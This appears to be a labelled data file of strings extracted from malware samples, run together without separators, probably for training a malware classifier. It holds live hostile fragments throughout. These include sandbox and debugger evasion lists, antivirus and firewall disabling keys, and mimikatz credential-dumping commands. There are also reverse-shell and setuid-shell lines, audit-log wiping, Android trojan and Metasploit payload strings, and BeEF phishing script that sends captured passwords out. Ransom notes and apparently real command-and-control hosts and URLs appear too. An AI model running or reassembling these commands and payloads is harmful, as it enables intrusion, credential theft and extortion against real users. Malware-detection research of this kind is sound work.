1 ati.jo840112-cras8468-11150923-pci8273vprincpespr!ncpeshastati\\temp\\~v3.logbrowser password recovery reportbrowserpassworddecryptorwww.securityxploded.comc:\\users\\bernardino\\appdata\\roaming\\berna@consultoreslegales.com.mx (1).pstmail password recovery reportmailpassworddecryptorc:\\users\\apant\\documents\\programdata\\abacus.ostc
1 ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
1 gk%1_slocal t = w.exec2str(\"regedit local r = w.exec2str(\"catap*.txt link*.txt node*.tun virtualencryptednetwork.licencemove o fakevirtualencryptednetwork.dllsinfo | basex b 32url | dext l 30w.exec2str(execstr)netnfo irc | basex b 32urlw.exec(\"wfw status\")exec(\"samdump\")cat virtualencryptednetwork.ini|grepif string.lower(k) == \"securityproviders\" thenexec2str(\"plist b | grep netsvcs\").*account.*|.*acct.*|.*domain.*|.*login.*|.*member.*sauron_kblog_key =resolve hosts that answerprint only replying ipsdo not display mac addressesinject using process name or pid. defaultconvert mode: read log from file and convert to textmaximum running time in seconds64, 64url, 32, 32url or 16.force decoding when input is invalid/corruptthis cruftassemble rows of dns names back to a single string of dataremoves checks of dns names and lengths (during split)randomize data lengths (length/2 to length)n
1 polycrypt pe (c) 2004-2005, jlabsoftware.
1 downloadfile - exception:%s,code:0x%08x.mozilla/4.0 (compatible; msie 7.0; windows nt 5.1)cdllapp::initinstance() - evnet already exists../emptycriss <target ip>cut and paste the following to the telnet prompt:environ define ttyprompt abcdefrunning \\\"tcpdump -n -n\\\", on the environment variable \\$interface, scriptedcannot read $opetc/scripme.override -- are you root?$env{exploit_scripme}the encryption key is ___tempfile2.outunless the -c (clobber) option is used, if two retr commands of themywarn(\"end of $destfile determined by \\\"^connection closed by foreign host\\\"\")end of $destfile determined by \"^connection closed by foreign host> /var/log/audit/audit.log; rm -f .pastables to run on target:cp /var/log/audit/audit.log .tmphere is the first good cron session fromno need to clean login lines.sh >/dev/tcp/ <&1 2>&1test: mungedport=%6d pp=%d unmunged=%6decho \"example: ${0} -l 192.168.1.1 -p 22222 -x 9999\"-x [ port to start mini x server on default = 12121 ]\"callback_port=32177usage: %s -e -v -i target ip [-c cert file] [-k key file]type=licxfer&ftp=%s&source=/var/home/ftp/pub&version=na&licfile=[-l log file] [-m save mac time file(s)] [-p server port]chown root sh; chmod 4777 sh;cp /bin/sh .;chown root sh;echo clean up when elevated:exe=$dir/sbin/ey_vrupdatedel --- usage: %s -l file -w wtmp -r userroasting ->%s<- at ->%d:%d<-rbnoil -roasting ->requested forwarding of port %d but user is not root.internal error: we do not read, but chan_read_failed for istate~# - list forwarded connectionspacket_inject_ignore: blockresult = self.send_command(\"ls -al %s\" % self.options.dir)cmd += \"d=-l%s \" % self.options.listen_portuse this on target to get your rat:$ratremotename && $command = \"$nc$bindto -vv -l -p $port < ${ratremotename}\" ;usage: %s -l [ netcat listener ] [ -p optional target port instead of 23 ] <ip>target is not vulnerable. exitingsending final buffer: evil_blocks and shellcode...timeout waiting for daemon to die. exploit probably failed.usage: %s <host> <port> e <contents of a local file to be executed on target>writing your %s to target.(e)xploit, (r)ead, (m)ove and then write, (w)rite-c command: shell command stringcannot combine shell command mode with args to do socket reuse-r: reuse socket for nopen connection (requires -t, -d, -f, -n, no -c)firing with the same hosts, on altername ports (target is on 8080, listener on 443)recieved unknown command payload: 0x%xusage: eslide [options] <-t profile> <-l listenerip> <targetip>-------- delete key - remove a *closed* tabusage: ./exp command display_to_return_tosizeof shellcode = %dexecve failed!echo \"example: ${0} -l 192.168.1.1 -p 22222 -s 22223 -x 9999\"echo \"call back port2 = ${sport}\"* * * * * root chown root %s; chmod 4755 %s; %s[-] kernel not vulnerable[-] failed to spawn shell: %s-s shell use shell instead of %susage: %s address [-t][-s|-c command] [-p port] [-v 5|6|7]error: not vulnerableport=%d connected! xxx.xxxxxxexecuting ./ebbnew_linux -r %s -v %s -a %s %s -t %s -p %s./ebbnew_linux.wrapper -o 2 -v 2 -t 192.168.10.4 -p 32772version 1 - start with option #18 first, if it fails then try this option%s is a wrapper program for ebbnew_linux exploit for sparc solaris rpc services# building shellcode into exploit.%s -w /index.html -v 3.5 -t 10 -c \"/usr/openwin/bin/xterm -d 555.1.2.2:0&\" -d 10.0.0.1 -p 80# starting exhaustive attack against usage: $prog [-f directory] -p prognum [-v ver] [-t proto] -i ipadr$gotsunos = ($line =~ /program version netid address service owner/ );+ bruteforce mode.+ host is not running samba!+ connecting back to: [%d.%d.%d.%d:45295]+ exploit failed, try -b to bruteforce.usage: %s [-bbccdfprsstv] [host]** significantly improve processing time-c cmd_name: strncmp() search for 1st %d chars of commands that mysql \\$d --host=\\$h --user=\\$u --password=\\\"\\$p\\\" -e \\\"select * from \\$twindow 3: $0 -uadmin -ppassword -i127.0.0.1 -dipboard -c\\\"sleep 500|nc$ua->agent(\"mozilla/4.0 (compatible; msie 6.0; windows nt 5.0)\");$url = $host . \"/admin/index.php?adsess=\" . $enter . \"&app=core&module=applications&section=hooks&do=install_hook\";usage: %s -i <ip_addr/hostname> -c <command> -t <target_type> (-u <port> | -t <port>) -i target ip address / hostname note: choosing the correct target type is a bit of guesswork.solaris rpc.cmsd remote root exploitif one choice fails, you may want to try another.shellfilecompleted.1zeke_remove%s/%s server failing (looping), service terminatedgetpwnam: %s: no such userexecv %s: %m%s/%s: unknown service?usage: %s <shellcode> <output_file>here is the decoder+(encoded-decoder)+payloadusage: %s hostip port cmd [printer_name]command must be less than 61 chars__rw_read_waiting__mutexkind__rw_psharedusage: %s [-v] -t <target_ip> -p porterror - shellcode not as expected - unable to fix upwarning - core wipe mode - this will leave a core file on target[-c] wipe target core file (leaves less incriminating core on failed target)-a <jumpaddr> (shellcode address)*** insane undocumented incremental port mode!!! ***%x:%d --> %x:%d %d bytesclient: can't bind to local address, are you root?unable to register portcould not resolve destinationraw troubles$gotgs=1 if (($line =~ /scan for (sol|snmp)\\s+version/) orusage: $prog [-f file] -p prognum [-v ver] [-t proto] -i ipadr$scanth = $scanth . \" -s \" . $scanthreads;print \"java -jar jscanner.jar$scanth$list\\n\";exec(\"xterm $xargs -e /current/tmp/promptkill.kid.$tag $pid\");$xargs=\"-title \\\"kill process $pid?\\\" -name \\\"kill process $pid?\\\" -bg white -fg red -geometry 202x19+0+0\" ;.tmp.%d.xxxxxx[-] couldn't create temp file/boot/system.map-%s[+] shellcode prepared, re-executing[-] kernel not vulnerable: prctl[-] shell failed[!] selinux apparently enforcing. continue [y|n]? t=<target ip> [o=<port>] y=<target type>no command given!! bailing...no port. assuming 22.../tmp/ratload.tmp.shremote usage: /bin/telnet locip locport < /dev/console | /bin/sh\"uncompress -f ${name}.z && path=. ${args1} ${name} ${args2} && rm -f ${name}exploit_scripme=\"$exploit_scripme\"deftarget=`head /current/etc/opscript.txt 2>/dev/null | grepip 2>/dev/null | head -1`fatal error: -x port and -n port must not be the same.example: ewok -t target publicusage: cleaner host community fake_prog-g - subset of -m that green spirit hits --- ewok versionusage: xspy -display <display> -delay <usecs> -upchown root:root x;chmod 4777 x`' /tmp/logwatch.$2/cronusage: $0 ( -s ip port | cmd )os.execl(\"/bin/sh\", \"/bin/sh\", \"-c\", \"$cmd\")php_script=\"$home/public_html/info$x.php\"cat > /dev/tcp/127.0.0.1/80 <<end*** sorry about the raw output, i'll leave it for now-scan winn %s oneset uremoteuploadcommand \"[exec cat /current/.ourtn-ftshell-upcommand]\"send \"\\[ \\\"\\$bash\\\" = \\\"/bin/bash\\\" -o \\\"\\$shell\\\" = \\\"/bin/bash\\\" \\] &&system rm -f /current/tmp/ftshell.latest# ftshell -- file transfer shellwelcome to the network scanning toolscanning port %d/current/down/cmdout/scansscan for ssh versionprogram vers proto port serviceusage: %s [-v os] [-p] [-r] [-c command] [-a attacker] targetsending shellcode as part of an open command...cmdshellcodeyou will not be able to run the shellcode. exiting...e.g.: -n 1-1024,1080,6666,31337 # default is to dump out all scanned hosts found$bool .= \" -r \" if (/mibiisa.* -r/);sadmind is available on two ports, this also works)-x ip gives \\\"hostname:# users:load ...\\\" if positive xwin scanheader(\"set-cookie: bbsessionhash=\" . \\$hash . \"; path=/; httponly\");if ($code =~ /proxyhost/) {\\$rk[1] = \\$rk[1] - 1;#existsuser($u) or die \"user '$u' does not exist in database.\\n\";temp = ((left >> 1) ^ right) & 0x55555555right ^= (temp << 16) & 0xfffffffftempresult = \"\"num = self.bytes2long(data)if { [string length $uremoteuploadcommand]processuploadglobal dothisreallyquiet[-] failed to map file: %s[-] can not null terminate input data[!] name has size of 0!rsakey_txt = lo_execute('openssl genrsa 2048 2> /dev/null | openssl rsa -text 2> /dev/null')client_auth = binascii.hexlify(lo_execute('openssl rand 16'))[%.2u%.2u%.2u%.2u%.2u%.2u]0123456789abcdefabcedf:a}%j,r
1 seven_legion@india.comfor decrypt files
1 z{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}yuipwdfile0yuipkdfile0yuicrypted0yui1.0post %s http/1.0accept-encoding: identity, *;q=0ke
1 *mlt* = %*ip* = %*victimo* = %*name* = %[start][data]we control your digital worldrc4initializerc4decrypts
1 banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 get_badloginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
1 \\\\/applications/automator.app/contents/macos/docklightioreg -l | grep \"ioplatformserialnumber\" | awk -f+:users:shared:userevent.app:contents:macos:rm '/users/shared/userevent.app/contents/resources/userevent.icns'osascript -e 'tell application \"system events\" to get the hidden of every login item'osascript -e 'tell application \"system events\" to get the name of every login item'osascript -e 'tell application \"system events\" to get the path of every login item'servervisible \x00.aspack.adataaspack.aspack.ccgbitartsdastub!epackfsg!kkrunchy.mackt.maskpemew.mpress1.mpress2.neolite.nsp1.nsp2.nsp0.packedpebundlepebundlepec2topecompact2pec1pec2pec2mopelocknt.perplexpeshield.petiteprocrypt.rlpackrcryptor.rpcrypt.sforce3.spack.svkpthemida.themida.upack.bydwingupx0upx1upx2.upx0.upx1.upx2.vmp0.vmp1.vmp2vprotectwinlicenwwpack.yp.y0damozilla/4.0 (compatible; msie 6.0; windows nt 5.; sv1)trj:html err.trj:workfunc start.trj:cmd time out.trj:thread time out.trj:create pt done.trj:create pt error: mutex already exists.create pippe failed!transfering fileput paras error:cmd time out..cmd has been killed.h
1 microsoft enhanced cryptographic provider v1.0\\system32\\svchost.exe:repeat\x0d\x0adel %s\x0d\x0aif exist %s goto :repeat\x0d\x0adel %%0.php?compname=/path_active.php?compname=/fetch_updates_pops.php?compname=/is_array_own.php?compname=/checkpkg.php?compname=/versionchk.php?srs=/vtris.php?srs=/vtris1.php?srs=/fetch_updates_step.php?compname=/c wmic diskdrive list brief > /petal_active.php?compname=percf001.dat_percf001.datcurl_easy_performhttp://199.91.173.45/percf002.dathttp://199.91.173.45/update_dll.dllhttp://199.91.173.45/libcurld.dll!microsoft!winusb.exec:\\intel\\logs\\file.pdbc:\\users\\tranchulas\\documents\\visual studio 2008\\projects\\upload\\release\\upload.pdbc:\\users\\cert-india\\documents\\visual studio 2008\\projects\\ufile\\release\\ufile.pdbdoworku
1 please restart your computer and wait for instructions for decrypting your files kscdsromantic9%9r9f9q9i
1 download excuteencryptorfunctionpointer %d%s\\%s.lnkmac:%s-cpu:%s-hd:%sfeed back responce of hostget token at hostdwn md5 err\
1 /c c:\\progra~1\\msbuild\\temp\\7za.exe e -oc:\\progra~1\\msbuild\\temp\\ c:\\progra~1\\msbuild\\temp\\inf.7z -p122333444455555 -y/c c:\\progra~1\\msbuild\\temp\\32.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\64.exe privilege::debug \"sekurlsa::logonpasswords full\" exit > c:\\progra~1\\msbuild\\temp\\%s.txt/c c:\\progra~1\\msbuild\\temp\\crypt.exe --encrypt c:\\progra~1\\msbuild\\temp\\public.key c:\\progra~1\\msbuild\\temp\\%s.txt c:\\progra~1\\msbuild\\temp\\%s.inc/c attrib +h +s c:\\progra~1\\msbuild\\temp
1 abccbadanabccbtkeyloggerufiletransferttdownloadsettings#@#@#plugindataonpluginmessagee-dataquaverse/crypterqrypt.classjarizer.classurlconnection.class!!<3safia<3!!!!elmattadordz!!stub_2.propertiess
